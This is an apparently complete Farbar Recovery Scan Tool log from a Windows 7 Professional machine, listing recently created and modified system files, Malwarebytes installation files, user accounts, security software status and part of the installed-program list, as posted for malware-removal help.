2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:04 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2019-10-08 19:04 - 2019-09-16 21:03 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2019-10-08 19:04 - 2019-09-16 21:00 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2019-10-08 19:04 - 2019-09-16 21:00 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2019-10-08 19:04 - 2019-09-16 21:00 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2019-10-08 19:04 - 2019-09-16 20:59 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2019-10-08 19:04 - 2019-09-16 20:59 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2019-10-08 19:04 - 2019-09-16 20:59 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2019-10-08 19:04 - 2019-09-16 20:59 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2019-10-08 19:04 - 2019-09-16 20:59 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2019-10-08 19:04 - 2019-09-16 20:57 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2019-10-08 19:04 - 2019-09-16 20:57 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 20:57 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 20:57 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 20:57 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 20:56 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2019-10-08 19:04 - 2019-09-16 20:56 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2019-10-08 19:04 - 2019-09-16 20:55 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2019-10-08 19:04 - 2019-09-16 20:53 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2019-10-08 19:04 - 2019-09-16 20:53 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2019-10-08 19:04 - 2019-09-16 20:52 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2019-10-08 19:04 - 2019-09-16 20:52 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2019-10-08 19:04 - 2019-09-16 20:52 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2019-10-08 19:04 - 2019-09-16 20:52 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2019-10-08 19:04 - 2019-09-16 20:51 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2019-10-08 19:04 - 2019-09-16 20:51 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2019-10-08 19:04 - 2019-09-16 19:13 - 000455392 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2019-10-08 19:04 - 2019-09-10 23:56 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2019-10-08 19:04 - 2019-09-10 23:56 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll
2019-10-08 19:04 - 2019-09-09 21:27 - 000383488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2019-10-08 19:04 - 2019-09-09 21:27 - 000320512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Faultrep.dll
2019-10-08 19:04 - 2019-09-09 21:27 - 000160256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 001281536 _____ (Microsoft Corporation) C:\Windows\system32\werconcpl.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 000174080 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 000086016 _____ (Microsoft Corporation) C:\Windows\system32\wercplsupport.dll
2019-10-08 19:04 - 2019-09-09 21:24 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\werdiagcontroller.dll
2019-10-08 19:04 - 2019-09-09 21:00 - 000361472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe
2019-10-08 19:04 - 2019-09-09 21:00 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWWIN.EXE
2019-10-08 19:04 - 2019-09-09 21:00 - 000054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2019-10-08 19:04 - 2019-09-09 21:00 - 000028672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFaultSecure.exe
2019-10-08 19:04 - 2019-09-09 21:00 - 000028672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werdiagcontroller.dll
2019-10-08 19:04 - 2019-09-09 20:54 - 003231744 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2019-10-08 19:04 - 2019-09-09 20:53 - 000416256 _____ (Microsoft Corporation) C:\Windows\system32\WerFault.exe
2019-10-08 19:04 - 2019-09-09 20:53 - 000152576 _____ (Microsoft Corporation) C:\Windows\system32\DWWIN.EXE
2019-10-08 19:04 - 2019-09-09 20:53 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2019-10-08 19:04 - 2019-09-09 20:53 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\WerFaultSecure.exe
2019-10-08 19:04 - 2019-09-09 20:52 - 000030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\monitor.sys
2019-10-08 19:04 - 2019-09-09 20:49 - 000317440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2019-10-08 19:02 - 2019-10-08 19:02 - 000199768 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-10-08 19:02 - 2019-10-08 19:02 - 000001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-10-08 19:02 - 2019-10-08 19:02 - 000001867 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2019-10-08 19:02 - 2019-10-08 19:02 - 000000000 ____D C:\Users\pmcstone\AppData\Local\mbamtray
2019-10-08 19:02 - 2019-10-08 19:02 - 000000000 ____D C:\Users\pmcstone\AppData\Local\mbam
2019-10-08 19:02 - 2019-10-08 19:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-10-08 19:02 - 2019-10-08 19:02 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-10-08 19:02 - 2019-10-08 19:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-10-08 19:02 - 2019-09-30 06:25 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-10-08 19:01 - 2019-10-08 19:01 - 009084848 _____ C:\Users\pmcstone\Downloads\mb-support-1.5.1.681.exe
2019-10-08 19:01 - 2019-10-08 19:01 - 001615872 _____ (Farbar) C:\Users\pmcstone\Downloads\FRSTEnglish.exe
2019-10-08 18:58 - 2019-10-08 18:58 - 000002505 _____ C:\Users\pmcstone\Desktop\export.txt
2019-10-08 18:51 - 2019-10-08 18:52 - 066482920 _____ (Malwarebytes ) C:\Users\pmcstone\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.629-1.0.12809.exe
2019-10-03 16:03 - 2019-09-11 22:53 - 000442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2019-10-03 16:03 - 2019-09-11 22:52 - 000373248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2019-10-03 16:03 - 2019-09-11 22:52 - 000195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2019-10-03 16:03 - 2019-09-11 22:44 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2019-10-03 16:03 - 2019-09-11 22:44 - 000499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2019-10-03 16:03 - 2019-09-11 22:44 - 000438784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2019-10-03 16:03 - 2019-09-11 22:44 - 000295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2019-10-03 16:03 - 2019-09-11 22:44 - 000284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2019-10-03 16:03 - 2019-09-11 22:24 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2019-10-03 11:52 - 2019-10-03 11:52 - 000059526 _____ C:\Users\pmcstone\Downloads\September 30, 2019.pdf
2019-10-03 08:11 - 2019-10-03 08:11 - 000000000 ____D C:\Users\pmcstone\AppData\Local\pmcstone
2019-09-27 11:52 - 2019-09-27 11:52 - 000016785 _____ C:\Users\pmcstone\Downloads\0000Y92247_Sep272019_Invoices.zip
2019-09-19 18:01 - 2019-10-08 18:58 - 000000000 ____D C:\Users\pmcstone\AppData\Roaming\MyCloud
2019-09-19 17:54 - 2019-09-19 18:02 - 000000000 ____D C:\Users\pmcstone\Documents\Discovermarble-1
2019-09-10 13:04 - 2019-08-15 20:02 - 000123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2019-09-10 13:04 - 2019-08-15 19:56 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2019-09-10 13:03 - 2019-08-28 21:52 - 000836608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2019-09-10 13:03 - 2019-08-28 21:50 - 001078784 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2019-09-10 13:03 - 2019-08-26 21:34 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\HdAudio.sys
2019-09-10 13:03 - 2019-08-22 17:07 - 000628480 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2019-09-10 13:03 - 2019-08-20 20:59 - 000311008 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2019-09-10 13:03 - 2019-08-20 20:56 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2019-09-10 13:03 - 2019-08-20 20:56 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2019-09-10 13:03 - 2019-08-20 20:56 - 000010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2019-09-10 13:03 - 2019-08-20 18:19 - 000034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2019-09-10 13:03 - 2019-08-19 23:24 - 000385248 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2019-09-10 13:03 - 2019-08-19 23:21 - 000101376 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2019-09-10 13:03 - 2019-08-19 23:21 - 000046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2019-09-10 13:03 - 2019-08-19 23:21 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2019-09-10 13:03 - 2019-08-19 23:21 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2019-09-10 13:03 - 2019-08-19 22:59 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ws2ifsl.sys
2019-09-10 13:03 - 2019-08-19 21:47 - 001251840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2019-09-10 13:03 - 2019-08-15 02:59 - 000878080 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2019-09-10 13:03 - 2019-08-15 02:59 - 000583680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2019-09-10 13:03 - 2019-08-14 12:54 - 003229184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2019-09-10 13:03 - 2019-08-14 12:54 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2019-09-10 13:03 - 2019-08-14 12:53 - 000253440 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2019-09-10 13:03 - 2019-08-14 12:53 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2019-09-10 13:03 - 2019-08-14 00:22 - 000374496 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2019-09-10 13:03 - 2019-08-14 00:20 - 003730432 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2019-09-10 13:03 - 2019-08-14 00:20 - 000300032 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2019-09-10 13:03 - 2019-08-14 00:20 - 000282112 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2019-09-10 13:03 - 2019-08-14 00:20 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2019-09-10 13:03 - 2019-08-14 00:19 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2019-09-10 13:03 - 2019-08-14 00:04 - 001053184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2019-09-10 13:03 - 2019-08-14 00:04 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2019-09-10 13:03 - 2019-08-13 23:59 - 001120768 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2019-09-10 13:03 - 2019-08-13 23:59 - 000249344 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2019-09-10 13:03 - 2019-08-13 23:52 - 000455680 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2019-09-10 13:03 - 2019-08-13 17:20 - 000162016 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2019-09-10 13:03 - 2019-08-13 17:19 - 000988384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2019-09-10 13:03 - 2019-08-13 17:19 - 000267488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2019-09-10 13:03 - 2019-08-13 17:16 - 000484864 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2019-09-10 13:03 - 2019-08-13 17:15 - 000732160 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2019-09-10 13:03 - 2019-08-13 17:15 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2019-09-10 13:03 - 2019-08-13 17:15 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2019-09-10 13:03 - 2019-08-13 17:13 - 000363520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2019-09-10 13:03 - 2019-08-13 17:13 - 000313344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2019-09-10 13:03 - 2019-08-12 21:58 - 001312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2019-09-10 13:03 - 2019-08-12 21:58 - 000475648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxbde40.dll
2019-09-10 13:03 - 2019-08-12 21:58 - 000313344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd2x40.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 002863104 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2019-09-10 13:03 - 2019-08-12 19:56 - 001712640 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 001650176 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000802304 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000634368 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000501760 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000456192 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2019-09-10 13:03 - 2019-08-12 19:56 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2019-09-10 12:35 - 2019-10-04 03:17 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
==================== One month (modified) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-10-08 21:47 - 2016-06-10 06:53 - 000000000 ____D C:\Windows\Minidump
2019-10-08 21:47 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\system32\Msdtc
2019-10-08 19:39 - 2017-12-20 15:00 - 000000222 _____ C:\Users\pmcstone\Desktop\XPO Logistics.url
2019-10-08 19:17 - 2009-07-13 23:45 - 000021872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-10-08 19:17 - 2009-07-13 23:45 - 000021872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-10-08 19:14 - 2009-07-14 00:13 - 001031156 _____ C:\Windows\system32\PerfStringBackup.INI
2019-10-08 19:14 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2019-10-08 19:10 - 2016-05-28 14:37 - 000000000 __SHD C:\Users\pmcstone\IntelGraphicsProfiles
2019-10-08 19:10 - 2016-05-27 19:33 - 000000404 _____ C:\Windows\wstdUPSWSHIP.INI
2019-10-08 19:10 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-10-08 19:09 - 2009-07-13 23:45 - 000444664 _____ C:\Windows\system32\FNTCACHE.DAT
2019-10-08 19:09 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\PolicyDefinitions
2019-10-08 19:06 - 2016-05-28 14:29 - 001023278 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2019-10-08 18:50 - 2018-05-30 13:40 - 000000000 ____D C:\Users\QBDataServiceUser28
2019-10-08 18:50 - 2016-05-27 19:24 - 000000000 ____D C:\Users\QBDataServiceUser25
2019-10-08 18:48 - 2016-05-27 23:19 - 000000000 ____D C:\Users\pmcstone
2019-10-08 18:48 - 2011-04-12 03:28 - 000000000 ____D C:\Windows\CSC
2019-10-04 03:17 - 2016-05-28 14:40 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-10-03 16:20 - 2016-05-28 15:01 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-10-03 16:19 - 2009-07-13 22:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared
2019-10-03 16:18 - 2016-05-28 14:59 - 000000000 ____D C:\Program Files\Microsoft Office
2019-10-03 15:39 - 2016-05-28 16:29 - 000011808 _____ C:\Users\pmcstone\Documents\Passwords.xlsx
2019-10-03 15:38 - 2016-11-17 09:48 - 000000000 ____D C:\Users\pmcstone\AppData\LocalLow\Mozilla
2019-10-01 12:08 - 2017-03-03 15:31 - 000000000 ____D C:\ProgramData\CanonIJPLM
2019-10-01 11:29 - 2016-05-31 09:03 - 000000000 ____D C:\Users\pmcstone\AppData\Roaming\TeamViewer
2019-09-30 18:22 - 2017-07-26 10:43 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-09-30 18:22 - 2017-07-26 10:43 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-09-30 18:22 - 2016-05-28 14:41 - 000000000 ____D C:\Program Files (x86)\Google
2019-09-24 18:22 - 2017-07-26 10:43 - 000002224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-09-23 14:06 - 2018-10-31 13:31 - 000000226 _____ C:\Windows\SysWOW64\SUMConfig.xml
2019-09-22 11:04 - 2018-07-13 10:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-09-11 10:21 - 2016-09-22 16:18 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2019-09-11 03:23 - 2016-05-30 03:17 - 000000000 ___SD C:\Windows\system32\CompatTel
==================== Files in the root of some directories ================
2016-05-27 20:40 - 2018-05-30 14:03 - 000000359 _____ () C:\Users\pmcstone\AppData\Roaming\FileDrTool.log
2016-05-27 18:54 - 2019-09-23 14:07 - 000060611 _____ () C:\Users\pmcstone\AppData\Roaming\QBFileDrTool.log
2018-05-30 14:04 - 2019-04-15 12:01 - 001455476 _____ () C:\Users\pmcstone\AppData\Roaming\QBFileDrTool_OFFICE.log
2016-05-28 14:37 - 2016-05-28 14:37 - 000000017 _____ () C:\Users\pmcstone\AppData\Local\resmon.resmoncfg
==================== SigCheck ===============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2016-05-28 00:49
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-10-2019
Ran by pmcstone (08-10-2019 19:55:36)
Running from C:\Users\pmcstone\Desktop
Windows 7 Professional Service Pack 1 (X64) (2016-05-28 04:19:21)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3260922531-1593714806-1494094557-500 - Administrator - Disabled)
Guest (S-1-5-21-3260922531-1593714806-1494094557-501 - Limited - Enabled)
pmcstone (S-1-5-21-3260922531-1593714806-1494094557-1000 - Administrator - Enabled) => C:\Users\pmcstone
QBDataServiceUser25 (S-1-5-21-3260922531-1593714806-1494094557-1001 - Limited - Enabled) => C:\Users\QBDataServiceUser25
QBDataServiceUser28 (S-1-5-21-3260922531-1593714806-1494094557-1006 - Limited - Enabled) => C:\Users\QBDataServiceUser28
QBDataServiceUser29 (S-1-5-21-3260922531-1593714806-1494094557-1007 - Limited - Enabled) => C:\Users\QBDataServiceUser29
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 19.012.20040 - Adobe Systems Incorporated)
Adobe Flash Player 21 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.183 - Adobe Systems Incorporated)
AlignmentUtility (HKLM-x32\...\{4C5E314A-31CA-4223-9A90-CE0C4D5800A4}) (Version: 22.00.0000 - UPS) Hidden
Asmedia USB Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.24.0 - Asmedia Technology)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Hidden
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MP Navigator EX 1.1 (HKLM-x32\...\MP Navigator EX 1.1) (Version: - )
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.01 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version: - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCC (HKLM-x32\...\{95749C5B-BC37-41E3-8D39-EEF4C21A2825}) (Version: 22.00.0000 - United Parcel Service, Inc.) Hidden
CCCHelp (HKLM-x32\...\{21C4D7B4-79A2-43F3-89EF-558CE4BEE85F}) (Version: 22.00.0000 - United Parcel Service, Inc.) Hidden
Cisco WebEx Meetings (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
Cisco WebEx Meetings (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
Cyberduck (HKLM-x32\...\{593105C4-C744-48CE-BA25-C0EE8F799D69}) (Version: 6.0.4.24953 - iterate GmbH) Hidden
